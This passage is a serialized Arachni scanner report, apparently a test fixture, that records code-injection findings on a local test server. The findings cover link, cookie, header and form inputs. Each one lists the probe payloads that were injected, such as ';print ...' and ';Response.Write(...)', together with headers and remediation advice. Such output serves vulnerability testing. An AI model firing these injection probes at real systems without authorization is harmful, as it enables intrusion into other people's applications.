    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;print 287630581954+4196403186331128
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;print 287630581954+4196403186331128
      :altered: input
      :element: link
      :params: 
        input: ;print 287630581954+4196403186331128
      :follow_location: true
      :injected: ;print 287630581954+4196403186331128
      :combo: 
        input: ;print 287630581954+4196403186331128
      :action: http://localhost:11414/python/link/straight?input=default
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/python/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: link
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/python/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: default;print 287630581954+4196403186331128
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;print 287630581954+4196403186331128
      :altered: input
      :element: link
      :params: 
        input: default;print 287630581954+4196403186331128
      :follow_location: true
      :injected: default;print 287630581954+4196403186331128
      :combo: 
        input: default;print 287630581954+4196403186331128
      :action: http://localhost:11414/python/link/append?input=default
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/python/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: cookie
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/python/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=%3Bprint+287630581954%2B4196403186331128;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;print 287630581954+4196403186331128
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;print 287630581954+4196403186331128
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: ;print 287630581954+4196403186331128
      :injected: ;print 287630581954+4196403186331128
      :combo: 
        cookie: ;print 287630581954+4196403186331128
      :action: http://localhost:11414/python/cookie/straight
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/python/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: cookie
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/python/cookie/append
  var: cookie2
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value%3Bprint+287630581954%2B4196403186331128
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: cookie value;print 287630581954+4196403186331128
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;print 287630581954+4196403186331128
      :altered: cookie2
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie2: cookie value;print 287630581954+4196403186331128
      :injected: cookie value;print 287630581954+4196403186331128
      :combo: 
        cookie2: cookie value;print 287630581954+4196403186331128
      :action: http://localhost:11414/python/cookie/append
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/python/cookie/append
    var: cookie2
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: header
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/python/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: ;print 287630581954+4196403186331128
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;print 287630581954+4196403186331128
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;print 287630581954+4196403186331128
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: ;print 287630581954+4196403186331128
      :injected: ;print 287630581954+4196403186331128
      :combo: 
        User-Agent: ;print 287630581954+4196403186331128
      :action: http://localhost:11414/python/header/straight
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/python/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: header
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/python/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user;print 287630581954+4196403186331128
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: arachni_user;print 287630581954+4196403186331128
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :injected_orig: ;print 287630581954+4196403186331128
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user;print 287630581954+4196403186331128
      :injected: arachni_user;print 287630581954+4196403186331128
      :combo: 
        User-Agent: arachni_user;print 287630581954+4196403186331128
      :action: http://localhost:11414/python/header/append
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/python/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: form
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: POST
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/asp/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: ;Response.Write(287630581954+4196403186331128)
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: POST
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;Response.Write(287630581954+4196403186331128)
      :altered: input
      :element: form
      :params: 
        input: ;Response.Write(287630581954+4196403186331128)
      :follow_location: true
      :injected: ;Response.Write(287630581954+4196403186331128)
      :combo: 
        input: ;Response.Write(287630581954+4196403186331128)
      :action: http://localhost:11414/asp/form/straight
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/asp/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: form
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/asp/form/append
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: default;Response.Write(287630581954+4196403186331128)
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: ;Response.Write(287630581954+4196403186331128)
      :altered: input
      :element: form
      :params: 
        input: default;Response.Write(287630581954+4196403186331128)
      :follow_location: true
      :injected: default;Response.Write(287630581954+4196403186331128)
      :combo: 
        input: default;Response.Write(287630581954+4196403186331128)
      :action: http://localhost:11414/asp/form/append
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/asp/form/append
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: link
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/asp/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: Response.Write(287630581954+4196403186331128)
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: Response.Write(287630581954+4196403186331128)
      :altered: input
      :element: link
      :params: 
        input: Response.Write(287630581954+4196403186331128)
      :follow_location: true
      :injected: Response.Write(287630581954+4196403186331128)
      :combo: 
        input: Response.Write(287630581954+4196403186331128)
      :action: http://localhost:11414/asp/link/straight?input=default
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/asp/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: link
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - regexp
  url: http://localhost:11414/asp/link/append?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "18"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "4196690816913082"
    injected: defaultResponse.Write(287630581954+4196403186331128)
    internal_modname: CodeInjection
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection
    name: Code injection
    opts: 
      :redundant: false
      :async: true
      :regexp: "4196690816913082"
      :match: "4196690816913082"
      :substring: "4196690816913082"
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      - 1
      :param_flip: false
      :injected_orig: Response.Write(287630581954+4196403186331128)
      :altered: input
      :element: link
      :params: 
        input: defaultResponse.Write(287630581954+4196403186331128)
      :follow_location: true
      :injected: defaultResponse.Write(287630581954+4196403186331128)
      :combo: 
        input: defaultResponse.Write(287630581954+4196403186331128)
      :action: http://localhost:11414/asp/link/append?input=default
      :verification: false
      :id: "4196690816913082"
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: "4196690816913082"
    regexp_match: "4196690816913082"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: "[4196690816913082]"
    severity: High
    tags: 
    - code
    - injection
    - regexp
    url: http://localhost:11414/asp/link/append?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
  elem: cookie
  internal_modname: CodeInjection
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection
  name: Code injection
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
